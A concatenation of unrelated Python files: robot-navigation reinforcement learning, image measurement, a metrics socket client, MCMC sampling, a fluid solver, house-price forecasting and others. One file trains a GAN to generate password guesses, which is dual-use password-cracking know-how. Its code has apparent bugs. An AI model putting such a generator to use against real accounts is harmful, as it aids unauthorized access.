from std_srvs.srv import Empty
from tf.transformations import euler_from_quaternion, quaternion_from_euler
from gazebo_msgs.msg import ModelStates
class Env():
def __init__(self):
'''variables of Odemetry related '''
self.robotPosition = Pose()
self.robotPosition_x = 0
self.robotPosition_y = 0
self.odom = []
self.orientation_list = []
'''goal position'''
self.goal_x = 0.75
self.goal_y = 0.85
'''variables of Lidar related'''
self.lidar_scan =[]
self.lidar_range = []
'''variables of Imu related'''
self.imu_data = []
self.imu_linearaccel = []
self.linear_accel_x = 0
self.linear_accel_y = 0
self.linear_accel_z = 0
'''variables of obstacle related'''
'''Init cmd_vel .This will get linear and angular velocity with all zero'''
self.actionVector = Twist()
'''Ros Init related Function and variables'''
self.pub_cmd_vel = rospy.Publisher('cmd_vel', Twist, queue_size=5)
self.sub_odom = rospy.Subscriber('odom', Odometry, self.getOdometryCallback, queue_size=1000)
self.sub_scan = rospy.Subscriber('scan', LaserScan, self.getLidarCallback)
self.sub_imu = rospy.Subscriber("imu", Imu, self.getImuCallback)
self.reset_proxy = rospy.ServiceProxy('gazebo/reset_simulation', Empty)
self.unpause_proxy = rospy.ServiceProxy('gazebo/unpause_physics', Empty)
self.pause_proxy = rospy.ServiceProxy('gazebo/pause_physics', Empty)
self.model_states = rospy.Subscriber('gazebo/model_states', ModelStates, self.getModelStatesCallback)
self.modelStatus = []
self.robot_x = -0.8
self.robot_y = 0.8
self.prev_robot_x = -0.8
self.prev_robot_y = 0.8
'''wait for topic data get ready ,or you will get nothing in the very beginning time'''
#self.wait_topic_ready()
def getModelStatesCallback(self ,modelStatusMsg):
self.modelStatus = modelStatusMsg
def getRobotStatus(self):
return self.modelStatus.pose[2].position.x ,self.modelStatus.pose[2].position.y
def wait_topic_ready(self):
#print(self.odom)
dataTest = None
for _ in range(1) :
while dataTest is None:
try:
dataTest = rospy.wait_for_message('scan', LaserScan, timeout=5)
dataTest = rospy.wait_for_message('odom', LaserScan, timeout=5)
dataTest = rospy.wait_for_message('imu', LaserScan, timeout=5)
except:
pass
#print(self.odom)
del dataTest
'''
### This is the topic odom's callback.Please call env.position to get position
### ,do not simply call getOdometry
'''
def getOdometryCallback(self, odom_msg):
self.odom = odom_msg
self.robotPosition = odom_msg.pose.pose.position
orientation = odom_msg.pose.pose.orientation
self.robotPosition_x = self.robotPosition.x
self.robotPosition_y = self.robotPosition.y
self.orientation_list = [orientation.x, orientation.y, orientation.z, orientation.w]
'''
get position from odom
'''
def getRobotPose_x_y(self):
return self.robotPosition_x ,self.robotPosition_y
'''
The sharp direction of lidar is the first element,
and counterclockwise is the second, 3..... element
### This is the topic Lidar's callback.
### ,do not simply call getOdometry
'''
def getLidarCallback(self, scan_msg):
self.lidar_scan = scan_msg
self.lidar_range = scan_msg.ranges
def getLaserScan(self):
scan_range = []
scan_range = np.array(self.lidar_range)
k = 0
for _ in range(24):
if scan_range[k] == float('inf') :
scan_range[k] = 2.0
k += 1
return scan_range
'''
### This is the topic imu's callback.
### ,do not simply call getOdometry
'''
def getImuCallback(self, imu_msg):
self.imu_data = imu_msg
self.imu_linearaccel = self.imu_data.linear_acceleration
self.linear_accel_x = self.imu_data.linear_acceleration
self.linear_accel_y = self.imu_data.linear_acceleration
self.linear_accel_z = self.imu_data.linear_acceleration
'''
step related functions for policy gradient
'''
'''
### action is a 1x2 vector ,
# action[0] = linear velocity along x direction
# action[1] = angular velocity around z axis
'''
def pubAction_x_w(self,x ,w):
self.actionVector.linear.x = x
self.actionVector.angular.z = w
#public the message to topic cmd_vel
self.pub_cmd_vel.publish(self.actionVector)
def pubAction_x_y(self ,vel_x ,vel_y):
self.actionVector.linear.x = vel_x
self.actionVector.linear.y = vel_y
#public the message to topic cmd_vel
self.pub_cmd_vel.publish(self.actionVector)
def takeAction(self ,action):
action_angle = 0
# 0
if action == 0:
print("Action Forward")
vel_x = 0.2
vel_y = 0.0
action_angle = 0
# 90
elif action == 1:
print("Action left")
vel_x = 0.0
vel_y = 0.2
action_angle = 90
# 45
elif action == 2:
print("Action left Forward")
vel_x = 0.2
vel_y = 0.2
action_angle = 45
# -90
elif action == 3:
print("Action right")
vel_x = 0.0
vel_y = -0.2
action_angle = -90
# -45
elif action == 4:
print("Action right Forward")
vel_x = 0.2
vel_y = -0.2
action_angle = -45
'''
elif action == 5:
vel_x = 0.2
vel_y = -0.2
elif action == 6:
vel_x = -0.2
vel_y = 0.2
elif action == 7:
vel_x = -0.2
vel_y = -0.2
'''
self.pubAction_x_y(vel_x ,vel_y)
time.sleep(0.2)
return action_angle
def getNewState(self):
return self.getLaserScan()
def isCollided(self ,new_state):
min_new_state = min(new_state)
print("min_new_state",min_new_state)
if min_new_state <= 0.16:
return True
elif min(new_state[1:4]) <=0.17:
return True
elif min(new_state[9:12]) <=0.17:
return True
elif min(new_state[16:20]) <=0.17:
return True
else:
return False
def isGoal(self ,x ,y):
if x >= self.goal_x and y <=self.goal_y :
return True
else:
return False
def setReward(self ,action_angle ,prev_state ,new_state ,x ,y):
#min_new_state = min(new_state)
state_forward = prev_state[0:2]
state_forward = np.append(state_forward ,prev_state[22])
state_f_left = prev_state[2:5]
state_left = prev_state[5:8]
state_right = prev_state[17:19]
state_f_right = prev_state[19:22]
if self.isCollided(new_state) :
print("Collided detected !")
done = True
reward = -10.0
print("Reward :",reward)
return done ,reward
elif self.isGoal(x ,y):
print("Goal !")
done = True
reward = 100.0
print("Reward :",reward)
return done ,reward
else:
done = False
if action_angle == 0:
print("In action forward reward setting")
print("state_forward" ,state_forward)
if max(state_forward) < 0.25:
reward = -2
elif max(state_forward) < 0.35:
reward = -0.5
elif max(state_forward) < 0.45:
reward = 0
elif max(state_forward) < 0.55:
reward = 0.5
else:
reward = 1
if min(state_forward) > 0.45:
reward += 2
elif min(state_forward) > 0.25:
reward += 0
else:
reward += -2
elif action_angle == 90:
print("In action left reward setting")
print("state_left" ,state_left)
if max(state_left) < 0.25:
reward = -2
elif max(state_left) < 0.35:
reward = -0.5
elif max(state_left) < 0.45:
reward = 0
elif max(state_left) < 0.55:
reward = 0.5
else:
reward = 1
if min(state_left) > 0.45:
reward += 2
elif min(state_left) > 0.25:
reward += 0
else:
reward += -2
elif action_angle == 45:
print("In action left forward reward setting")
print("state_f_left" ,state_f_left)
if max(state_f_left) < 0.25:
reward = -2
elif max(state_f_left) < 0.35:
reward = -0.5
elif max(state_f_left) < 0.45:
reward = 0
elif max(state_f_left) < 0.55:
reward = 0.5
else:
reward = 1
if min(state_f_left) > 0.45:
reward += 2
elif min(state_f_left) > 0.25:
reward += 0
else:
reward += -2
elif action_angle == -90:
print("In action right reward setting")
print("state_right" ,state_right)
if max(state_right) < 0.25:
reward = -2
elif max(state_right) < 0.35:
reward = -0.5
elif max(state_right) < 0.45:
reward = 0
elif max(state_right) < 0.55:
reward = 0.5
else:
reward = 1
if min(state_right) > 0.45:
reward += 2
elif min(state_right) > 0.25:
reward += 0
else:
reward += -2
elif action_angle == -45:
print("In action right forward reward setting")
print("state_f_right" ,state_f_right)
if max(state_f_right) < 0.25:
reward = -2
elif max(state_f_right) < 0.35:
reward = -0.5
elif max(state_f_right) < 0.45:
reward = 0
elif max(state_f_right) < 0.55:
reward = 0.5
else:
reward = 1
if min(state_f_right) > 0.45:
reward += 2
elif min(state_f_right) > 0.25:
reward += 0
else:
reward += -2
print("Reward :",reward)
return done ,reward
def step(self ,prev_state ,action):
action_angle = self.takeAction(action)
new_state = self.getNewState()
self.prev_robot_x ,self.prev_robot_y = self.robot_x ,self.robot_y
'''get robot's x y coordination'''
self.robot_x ,self.robot_y = self.getRobotStatus()
print("robot_x :",self.robot_x)
print("robot_y :",self.robot_y)
done ,reward = self.setReward(action_angle ,prev_state ,new_state ,self.robot_x ,self.robot_y)
return new_state ,float(reward) ,done
def reset(self):
### self.reset_proxy() will reset gazebo enviroment ,robot will reset to
# its default places which is setting in launch file.
rospy.wait_for_service('gazebo/reset_simulation')
try:
self.reset_proxy()
#except (rospy.ServiceException) as _:
except :
print("gazebo/reset_simulation service call failed")
#self.wait_topic_ready()
self.pubAction_x_y(0 ,0)
time.sleep(2.0)
# Return state
return self.getLaserScan()
|
# -*- coding: utf-8 -*-
import __init__
from abc import ABCMeta
from abc import abstractmethod
import threading
import time
from Configure.GetConfigure import GetConfigure
class Service(object):
__metaclass__ = ABCMeta
def __init__(self):
self.configures = GetConfigure()
self.load_config()
@abstractmethod
def load_config(self):
pass
@abstractmethod
def start(self):
_thread = threading.Thread(target=self.freshconfig)
_thread.setDaemon(True)
_thread.setName("Thread-Config")
_thread.start()
def freshconfig(self, once_sleep = 10):
'''
更新配置信息
:param once_sleep:
:return:
'''
while True:
self.configures = GetConfigure()
self.load_config()
time.sleep(once_sleep)
|
import cv2
import numpy as np
from PIL import Image
import math
drawing=True # true if mouse is pressed
def input_file(path,pix = 0.388):
PIXEL_SIZE = pix
def draw_circle(event,former_x,former_y,flags,param):
global current_former_x,current_former_y,drawing,distance
if event == cv2.EVENT_LBUTTONDBLCLK:
cv2.circle(img,(former_x,former_y),10,(255,0,0),-1)
if drawing == False:
cv2.line(img,(current_former_x,current_former_y),(former_x,former_y),(255,0,0),1)
dx2= (current_former_x-former_x)**2
dy2= (current_former_y-former_y)**2
distance = math.sqrt(dx2 + dy2)
distance = distance * .25 * PIXEL_SIZE
print(distance)
print("mm")
# current_former_x,current_former_y=former_x,former_y
drawing = True
else :
current_former_x,current_former_y=former_x,former_y
drawing = False
try:
im_np = Image.open(path)
img = np.array(im_np)
except IOError:
pass
cv2.namedWindow("Image")
cv2.setMouseCallback('Image',draw_circle)
while(1):
cv2.imshow('Image',img)
k=cv2.waitKey(1)&0xFF
if k==27:
break
cv2.destroyAllWindows()
return distance |
import os
from datetime import datetime
from tqdm.autonotebook import tqdm
import shutil
from functools import partial
import numpy as np
import pickle
import tensorflow as tf
import tensorflow_datasets as tfds
import tensorflow.keras.backend as K
from tensorflow.python.keras import metrics
from tensorflow import random
from gan_submodels import ResBlock, Discriminator, Generator
tf.config.experimental_run_functions_eagerly(True)
class passwordGAN:
def __init__(self):
""" Initializes model and tokenizer """
self.G = Generator(layer_dim=128, seq_len=10)
self.D = Discriminator(layer_dim=128, seq_len=10)
self.optimizer = tf.keras.optimizers.Adam(learning_rate=0.0001, beta_1=0.5, beta_2=0.9)
self.tokenizer = tf.keras.preprocessing.text.Tokenizer(char_level=True, lower=False)
@staticmethod
def add_arguments(parser):
""" Adds the below arguments to the given parser.
parser -- an argparse object
"""
parser.add_argument("--epochs", action="store", type=int, default=10, help="number of epochs to train for")
parser.add_argument("--batch", action="store", type=int, default=256, help="training batch size")
parser.add_argument("--gpus", action="store", type=int, default=1, help="number of GPUs that are being used to train the model")
parser.add_argument("--iterations", action="store", type=int, default=10000, help="number of iterations to train the GAN for per epoch")
parser.add_argument("--n_critic", action="store", type=int, default=10, help="number of critic updates per generator update")
parser.add_argument("--checkpoints", action="store", type=int, default=5000, help="Number of iterations per checkpoint")
def tokenize_training_data(self, infile, batch_size):
""" Reads the infile, and tokenizes all unique characters.
Tokenized passwords are used to create dataset which is
returned.
infile -- a file containing appropriately formatted training data
args -- if not None, the arguments returned by the parser passed
to add_arguments
"""
passwords = infile.read()
# create a character level encoding
self.tokenizer.fit_on_texts(passwords)
# number of distinct chars
max_id = len(self.tokenizer.word_index)
# number of chars
dataset_size = self.tokenizer.document_count
[encoded] = np.array(self.tokenizer.texts_to_sequences([passwords])) - 1
train_dataset = tf.data.Dataset.from_tensor_slices(encoded)
train_dataset = train_dataset.batch(batch_size, drop_remainder=False)
train_dataset = train_dataset.prefetch(tf.data.experimental.AUTOTUNE)
return train_dataset
def train(self, infile, args):
""" Trains the GAN using data read from the given infile.
infile -- a file containing appropriately formatted training data
args -- if not None, the arguments returned by the parser passed
to add_arguments
"""
dataset = self.tokenize_training_data(infile, args.batch)
g_train_loss = metrics.Mean()
d_train_loss = metrics.Mean()
current_time = datetime.now().strftime("%Y%m%d-%H%M%S")
checkpoint_directory = "./checkpoints/training_checkpoints"
g_checkpoint_prefix = os.path.join(checkpoint_directory + "/generator", "ckpt")
d_checkpoint_prefix = os.path.join(checkpoint_directory + "/discriminator", "ckpt")
for epoch in tf.range(args.epochs):
epoch = tf.cast(epoch, dtype=tf.int64, name=epoch)
bar = self.progress_bar(self.tokenizer.document_count, args.batch, epoch, args.epochs)
for iteration, batch in zip(range(args.iterations), dataset):
for _ in tf.range(args.n_critic):
real = tf.reshape(tf.dtypes.cast(batch, tf.float32), [2, 1, 32])
self.train_discriminator(real)
d_loss = self.train_discriminator(real)
d_train_loss(d_loss)
g_loss = self.train_generator()
g_train_loss(g_loss)
self.train_generator()
bar.postfix['g_loss'] = f'{g_train_loss.result():6.3f}'
bar.postfix['d_loss'] = f'{d_train_loss.result():6.3f}'
bar.update(args.batch)
if iteration % args.checkpoints == 0 and iteration > 0:
generator_checkpoint = tf.train.Checkpoint(optimizer=self.optimizer, model=self.G)
generator_checkpoint.save(file_prefix=g_checkpoint_prefix)
discriminator_checkpoint = tf.train.Checkpoint(optimizer=self.optimizer, model=self.D)
discriminator_checkpoint.save(file_prefix=d_checkpoint_prefix)
tf.saved_model.save(self.G, './models/generator/' + args.save)
tf.saved_model.save(self.D, './models/discriminator/' + args.save)
with open('./models/tokenizer/{}.pickle'.format(args.save), 'wb') as handle:
pickle.dump(self.tokenizer, handle, protocol=pickle.HIGHEST_PROTOCOL)
g_train_loss.reset_states()
d_train_loss.reset_states()
bar.close()
del bar
@tf.function
def train_generator(self):
""" Trains the generator submodel
"""
z = tf.random.normal([2, 1, 32], dtype=tf.dtypes.float32)
with tf.GradientTape() as t:
t.watch(z)
x_fake = self.G(z, training=True)
fake_logits = self.D(x_fake, training=True)
loss = self.wasserstein_loss(fake_logits)
grad = t.gradient(loss, self.G.trainable_variables)
self.optimizer.apply_gradients(zip(grad, self.G.trainable_variables))
return loss
@tf.function
def train_discriminator(self, real):
""" Trains the discriminator submodel
"""
z = tf.random.normal([2, 1, 32], dtype=tf.dtypes.float32)
with tf.GradientTape() as t:
t.watch(z)
real_logits = self.D(real, training=True)
x_fake = self.G(z, training=True)
fake_logits = self.D(x_fake, training=True)
cost = self.discriminator_loss(fake_logits, real_logits)
gp = self.gradient_penalty(partial(self.D, training=True), real, x_fake)
cost += 10.0 * gp
grad = t.gradient(cost, self.D.trainable_variables)
self.optimizer.apply_gradients(zip(grad, self.D.trainable_variables))
return cost
def gradient_penalty(self, f, real, fake):
""" A function that applies the gradient penalty for training the discriminator
"""
alpha = random.uniform([2, 1, 32], 0., 1.)
diff = fake - real
inter = real + (alpha * diff)
with tf.GradientTape() as t:
t.watch(inter)
pred = f(inter)
grad = t.gradient(pred, [inter])[0]
slopes = tf.sqrt(tf.reduce_sum(tf.square(grad), axis=[1, 2]))
gp = tf.reduce_mean((slopes - 1.) ** 2)
return gp
def discriminator_loss(self, f_logit, r_logit):
""" Loss function for the discriminator submodel
"""
f_loss = tf.reduce_mean(f_logit)
r_loss = tf.reduce_mean(r_logit)
return f_loss - r_loss
def wasserstein_loss(self, f_logit):
""" Function that calculates wasserstein loss
"""
f_loss = -tf.reduce_mean(f_logit)
return f_loss
def load(self, filename):
""" Loads the neural network and tokenizer that defines from filename
filename -- the name of a file containing data saved by the save
method for a compatible policy
"""
self.G = tf.keras.models.load_model("models/generator/{}".format(filename))
self.D = tf.keras.models.load_model("models/discriminator/{}".format(filename))
with open('models/tokenizer/{}.pickle'.format(filename), 'rb') as handle:
self.tokenizer = pickle.load(handle)
@tf.function
def generate_samples(self, num):
""" Generates 'num' number of samples using the generator
num -- number of samples to generate
"""
output = []
for i in range(num):
z = tf.convert_to_tensor(tf.random.normal([2, 1, 32], dtype=tf.dtypes.float32))
samples = self.G(z, training=False)
samples = samples.numpy()
samples = np.argmax(samples, axis=2)
for i in range(len(samples)):
decoded = []
for j in range(len(samples[i])):
decoded.append([samples[i][j]])
print(tokenizer.sequences_to_texts(decoded)[0], end="")
def get_terminal_width(self):
""" Gets the terminal width to properly display the progress bar
"""
width = shutil.get_terminal_size(fallback=(200, 24))[0]
if width == 0:
width = 120
return width
def progress_bar(self, total_passwords, batch_size, epoch, epochs):
""" Creates an instance of the progress bar class
total_passwords -- total number of passwords in the dataset
batch_size -- batch size for the training process
epoch -- current epoch
epochs -- total number of epochs
"""
bar = tqdm(total=total_passwords * epochs,
ncols=int(self.get_terminal_width() * .9),
desc=tqdm.write(f'Epoch {epoch + 1}/{epochs}'),
postfix={
'g_loss': f'{0:6.3f}',
'd_loss': f'{0:6.3f}',
1: 1
},
bar_format='{n_fmt}/{total_fmt} |{bar}| {rate_fmt} '
'ETA: {remaining} Elapsed Time: {elapsed} '
'G Loss: {postfix[g_loss]} D Loss: {postfix['
'd_loss]}',
unit=' passwords',
miniters=10)
return bar
|
def read():
with open('A-large.in') as f:
return f.readlines()
def write(lines):
with open('result.txt', 'w') as f:
i = 1
for line in lines:
f.write('Case #' + str(i) + ': ' + str(line) + '\n')
i += 1
def solve(data):
res = []
for num in data:
s = set()
i = 1
while True:
if num == 0:
res.append('INSOMNIA')
break
for el in list(str(num * i)):
s.add(el)
if len(s) == 10:
res.append(num * i)
break
i += 1
return res
if __name__ == '__main__':
data = list(map(int, read()))[1:]
write(solve(data))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# "THE WISKEY-WARE LICENSE":
# <utn_kdd@googlegroups.com> wrote this file. As long as you retain this notice
# you can do whatever you want with this stuff. If we meet some day, and you
# think this stuff is worth it, you can buy us a WISKEY in return.
#===============================================================================
# DOC
#===============================================================================
"""yatel.client module tests"""
#===============================================================================
# IMPORTS
#===============================================================================
import random, json, tempfile, os, unittest
from jsonschema import ValidationError
from yatel import client, qbj, typeconv, db
from yatel.cluster import kmeans
from yatel.tests import test_qbj
from yatel.tests import core
#===============================================================================
# VALIDATE TESTS
#===============================================================================
@unittest.skipUnless(core.MOCK, "require mock")
class TestQBJClient(test_qbj.QBJEngineTest):
def setUp(self):
super(TestQBJClient, self).setUp()
self.client = client.QBJClient("http://localhost:8000", "test")
def execute(self, query):
response = self.client.execute(query)
return super(TestQBJClient, self).execute(query)
def test_kmeans(self):
envs = map(dict, self.nw.environments(["native", "place"]))
query = {
"id": 1,
"function": {
"name": 'kmeans',
"args": [
{"type": 'literal', "value": envs},
{"type": 'literal', "value": 2}
]
}
}
orig = kmeans.kmeans(self.nw, envs=envs, k_or_guess=2)
rs = typeconv.parse(self.execute(query)["result"])
self.assertEquals(orig[0], rs[0])
self.assertEquals(orig[1], rs[1])
#===============================================================================
# MAIN
#===============================================================================
if __name__ == "__main__":
print(__doc__)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from parts.speaker import Speaker
SPEAKER_PIN = 5
# ドレミのメロディ
melody = ((262, 1),(294, 1),(330, 1),)
# メロディーの値を表示
for value in melody:
pitch_name, length = value
print('{0}, {1}'.format(pitch_name, length))
# メロディーの再生
speaker = Speaker(SPEAKER_PIN)
speaker.play(melody)
|
import socket
import time
# class for client obj put exception
class ClientError(socket.error):
pass
class Client:
def __init__(self, addr, port, timeout=None):
self.addr = addr
self.port = port
try:
self.sock = socket.create_connection((self.addr, self.port), timeout)
except socket.error as err:
ClientError("error create connection", err)
def _read(self):
data = b""
while not data.endswith(b"\n\n"):
try:
data += self.sock.recv(1024)
except socket.error as err:
raise ClientError("error recv data", err)
decoded_data = data.decode()
status, payload = decoded_data.split("\n", 1)
payload = payload.strip()
if status == "error":
raise ClientError(payload)
return payload
def put(self, metric_name, metric_val, timestamp = int(time.time())):
try:
self.sock.sendall("put {} {} {}\n".format(metric_name, metric_val, timestamp).encode())
except socket.error as err:
raise ClientError("error send data", err)
self._read()
def get(self, metric_name):
try:
self.sock.sendall("get {}\n".format(metric_name).encode())
except socket.error as err:
raise ClientError("error send data")
payload = self._read()
data = {}
if payload == "":
return data
for row in payload.split("\n"):
key, value, timestamp = row.split()
if key not in data:
data[key] = []
data[key].append((int(timestamp), float(value)))
return data
def close(self):
try:
self.sock.close()
except socket.error as err:
raise ClientError("error close connection", err)
#### tests
#client = Client("127.0.0.1", 8888, timeout=15)
#client.put("palm.cpu", 0.5, timestamp=1150864247)
#client.put("palm.cpu", 2.0, timestamp=1150864248)
#client.put("palm.cpu", 0.5, timestamp=1150864248)
#client.put("eardrum.cpu", 3, timestamp=1150864250)
#client.put("eardrum.cpu", 4, timestamp=1150864251)
#client.put("eardrum.memory", 4200000)
#print(client.get("*"))
|
from path_class import *
from gibbs_MJPs import sampleUI
from gibbs_MJPs import get_likelihood
from gibbs_MJPs import FFBS
from math import log
from numpy import random
from scipy.stats import gamma
from math import pi
from math import sqrt
from math import exp
from model_parameters import *
from gibbs_MJPs import FF
from gibbs_MJPs import BS
# in MHsampler, all the trajectories DON'T contain virtual jumps
# parameters = [alpha, beta]
def MHu_sampler_one(observation, ST_old, k, parameters, mu, lamb, omega, theta, var):
# basic information
initial_pi = copy.deepcopy(ST_old.initial_pi)
N = len(initial_pi)
t_start = ST_old.t_start
t_end = ST_old.t_end
w = len(ST_old.T)
# copy old parameters
matrix_old = copy.deepcopy(ST_old.rate_matrix)
alpha_old = parameters[0]
beta_old = parameters[1]
# Step 1 Propose a theta* based on log normal distribution with variance var
alpha_new, beta_new = propose(alpha_old, beta_old, var)
matrix_new = constructor_rate_matrix(alpha_new, beta_new, N)
OMEGA_old = get_omega(matrix_old, k / 2.)
OMEGA_new = get_omega(matrix_new, k / 2.)
# OMEGA = max(OMEGA_new, OMEGA_old)
OMEGA = OMEGA_new + OMEGA_old
# Step 2 Sample W*:
uipath_old = sampleUI(ST_old, OMEGA)
# calculate likelihood
likelihood = get_likelihood(observation, uipath_old.T, N, [t_start, t_end])
# Forward calculate P(Y | W, alpha_old, beta_old)
logp_old, ALPHA_old = FF(likelihood, initial_pi, OMEGA, uipath_old)
# Temperarily change the rate matrix in order to cal marginal probability
uipath_old.rate_matrix = matrix_new
# Forward calculate P(Y | W, alpha_old, beta_new)
logp_new, ALPHA_new = FF(likelihood, initial_pi, OMEGA, uipath_old)
# Step 3 decide whether exchange theta* and theta
accept_rate = logp_new - logp_old + mu * (log(alpha_new) - log(alpha_old)) - lamb * (alpha_new - alpha_old) + omega * (log(beta_new) - log(beta_old)) - theta * (beta_new - beta_old)
# accept_rate *= propose_p(beta_new, beta_old, var) * propose_p(alpha_new, alpha_old, var) / propose_p(beta_old, beta_new, var) / propose_p(alpha_old, alpha_new, var)
accept_rate = min(0, accept_rate)
if log(random.uniform()) < accept_rate: # proposed beta is accepted
beta_old = beta_new
alpha_old = alpha_new
ST_new = BS(initial_pi, ALPHA_new, likelihood, OMEGA, uipath_old)
else: # rejected
uipath_old.rate_matrix = matrix_old
ST_new = BS(initial_pi, ALPHA_old, likelihood, OMEGA, uipath_old)
# Step 4 Delete virtual jumps
ST_new.delete_virtual()
return ST_new, alpha_old, beta_old
def MHusampler(observation, pi_0, sample_n, T_interval, k, mu, lamb, omega, theta, var, iv):
alpha_list = []
beta_list = []
ST_list = []
alpha_old = iv[0]
beta_old = iv[1]
rate_matrix = constructor_rate_matrix(alpha_old, beta_old, len(pi_0))
ST_old = MJPpath(t_start=T_interval[0], t_end=T_interval[1], rate_matrix=rate_matrix, initial_pi=pi_0)
ST_old.generate_newpath()
ST_list.append(copy.deepcopy(ST_old))
for i in range(sample_n):
# my_print(i, 1000)
ST_new, alpha_new, beta_new= MHu_sampler_one(observation, ST_old, k, [alpha_old, beta_old], mu, lamb, omega, theta, var)
ST_list.append(copy.deepcopy(ST_new))
alpha_list.append(alpha_new)
beta_list.append(beta_new)
ST_old, alpha_old, beta_old = ST_new, alpha_new, beta_new
return ST_list, alpha_list, beta_list
|
from dolfin import *
import sys
import numpy as np
sys.path.append('../')
from navier_stokes import *
if has_linear_algebra_backend("Epetra"):
parameters["linear_algebra_backend"] = "Epetra"
# Sub domain for Dirichlet boundary condition
#class DirichletBoundary(SubDomain):
# def inside(self, x, on_boundary):
# return abs(x[0] - 1.0) < DOLFIN_EPS and on_boundary
def boundary_left(x):
return x[0] < -5. + 1e-10#DOLFIN_EPS
def boundary_right(x):
return x[0] > 5. - 1e-10#DOLFIN_EPS
# Class representing the intial conditions
class InitialConditions(UserExpression):
def eval(self, values, x):
if (x < 0.5):
values[0] = 1.0
values[2] = 2.5
else:
values[0] = 0.125
values[2] = 0.25
values[1] = 0.0
def value_shape(self):
return (3,)
class ShuInitialConditions(UserExpression):
def eval(self,Q,x):
R = 1
Cv = 5./2.
mp = -4.
press = 10. + 1./3.
rho = 3.857143
u = 2.629369
if (x[0] > mp):
press = 1.
rho = (1. + 0.2*sin(5.*x[0]) )
u = 0
T = press/(rho*R)
E = Cv*T + 0.5*u**2
Q[0] = rho
Q[1] = rho*u
Q[2] = rho*E
def value_shape(self):
return (3,)
# Create mesh and define function space
nx = 400
p = 2
#mesh = UnitIntervalMesh(nx)
L = 10.
mesh = IntervalMesh(nx,-5.,5.)
File("mesh.pvd") << mesh
element = VectorElement("CG", mesh.ufl_cell(), p,dim=3)
V = FunctionSpace(mesh, element)
# Define boundary condition
#u0L = Constant([1.0,0.0,2.5,0,0,0]) #sod
u0L = Constant([3.857143,10.141852232767,39.1666692650425]) #sod
bcl = DirichletBC(V, u0L, boundary_left)
#u0R = Constant([0.125,0.0,0.25,0,0,0]) #sod
u0R = Constant([0.9475250292592142,0.,2.5])
bcr = DirichletBC(V, u0R, boundary_right)
# Define variational problem
U = Function(V)
U_n = Function(V)
Phi = TestFunction(V)
u_init = ShuInitialConditions()
U.interpolate(u_init)
U_n.interpolate(u_init)
f = Constant(1)
nu = 1e-3
b = Constant([1.,0.])
dt = 0.0005
dti = 1./dt
et = 2.0
Ux = U.dx(0)
Rx = eulerInviscidFlux(U)
R_strong = strongFormResidNS(U,Ux)
R_strong += dti*(U - U_n)
tau_rat = 0.5
tau = tau_rat*dt#(L/nx) / rhoVal
JTPhi = applyJT(U, Phi.dx(0) )
AU = applyJ(U,Ux)
F = 0
for i in range(0,3):
F += inner( Phi[i] ,AU[i] )*dx + \
inner( JTPhi[i] , tau* R_strong[i])*dx
for i in range(0,3):
F = F + inner(Phi[i], dti*(U[i] - U_n[i]) )*dx
# Compute solution
t = 0
counter = 0
coor = mesh.coordinates()
q_degree = 3
dx = dx(metadata={'quadrature_degree': q_degree})
nxSave = 1000
sol_save = np.zeros((0,3,nxSave))
def grab_sol(U):
u_1_, u_2_, u_3_ = U.split()
x = np.linspace(-L/2,L/2,nxSave)
U = np.zeros((3,nxSave))
for i in range(0,nxSave):
U[0,i] = u_1_(x[i])
U[1,i] = u_2_(x[i])
U[2,i] = u_3_(x[i])
return U
save_freq = 10
while (t <= et - dt/2):
file = File("Sol/PVsol_" + str(counter) + ".pvd")
#u_1_, u_2_, u_3_,u_4_,u_5_,u_6_ = U.split()
#file << u_1_
solve(F == 0, U, [bcl,bcr], solver_parameters={"newton_solver":{"relative_tolerance": 1e-6}})
if (counter % save_freq == 0):
sol_save = np.append(sol_save,grab_sol(U)[None],axis=0)
U_n.assign(U)
t += dt
# #plot(u,interactive=True)
counter += 1
print(t,counter)
#'''
np.savez('SolShu/supg3_nx_' + str(nx) + '_taurat_' + str(tau_rat) + '_dt_' + str(dt) ,U=sol_save,tau=tau,dt=dt)
|
# example showing how time series is applied
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import datetime
from statsmodels.tsa.seasonal import seasonal_decompose
from pandas import Series,DataFrame,DatetimeIndex
from statsmodels.tsa.arima_model import ARIMA
from pandas.tools.plotting import autocorrelation_plot
import statistics
from scipy import stats
from datetime import datetime
# get national mean price
price = pd.read_csv('newdata/Zip_MedianListingPrice_AllHomes.csv',converters={'RegionName': str})
national_mean = price.drop(['RegionName','City','State','Metro','CountyName','SizeRank'],axis=1).mean(axis=0)
dates = national_mean.index
# remove trend and plot vs. original data
data = DataFrame(national_mean.tolist(), DatetimeIndex(start=dates[0],periods=len(dates),freq='M'))
moving_avg = pd.rolling_mean(data,12)
moving_avg.index = national_mean.index
diff = data.values - moving_avg.values
diff = DataFrame([item for sublist in diff for item in sublist])
diff.index = national_mean.index
plt.plot(moving_avg.values)
plt.plot(national_mean.values)
plt.show()
# remove seasonality and plot residual vs. trend residual
diff_clean = diff.dropna()
diff_clean = DataFrame([item for sublist in diff_clean.values for item in sublist], DatetimeIndex(start=dates[0],periods=len(diff_clean),freq='M'))
decomp = seasonal_decompose(diff_clean,freq=12,model="additive")
plt.plot(diff_clean)
plt.plot(decomp.seasonal)
plt.show()
residual = decomp.resid
plt.plot(residual)
# view data
national_mean.head(10)
diff.head(10)
residual.head(10)
# mean and sd of residual
residual_median = residual.median()
residual_sd = statistics.stdev([item for sublist in residual.dropna().values for item in sublist])
# record seasonal component and trend
cycle = [item for sublist in decomp.seasonal.values[-12:] for item in sublist]
last_dates = dates[-24:]
x = range(1,25)
y = [item for sublist in moving_avg.tail(24).values for item in sublist]
slope, intercept, r_value, p_value, std_err = stats.linregress(x, y)
# make prediction
test_date = '2018-04'
test_noise = residual_median
def diff_month(d1, d2):
return (d1.year - d2.year) * 12 + d1.month - d2.month
gap = diff_month(datetime.strptime(test_date, '%Y-%m'),datetime.strptime(last_dates[len(last_dates)-1], '%Y-%m'))
test_trend = intercept + slope * (x[len(x)-1]+gap)
test_season = cycle[gap % 12 - 1]
test_pred = test_noise + test_trend + test_season
|
import numpy
import cv2
import matplotlib.pyplot as plt
def getPixelValue(padded_img, filter, i, j):
f_h, f_w = filter.shape
summed = 0
for k in range(f_h):
n_j = j
for l in range(f_w):
summed = summed + (filter[k][l] * padded_img[i][n_j])
n_j = n_j + 1
i = i + 1
return summed
def convolution(image, filter):
# get size of the filter
filter_size = filter.shape[1]
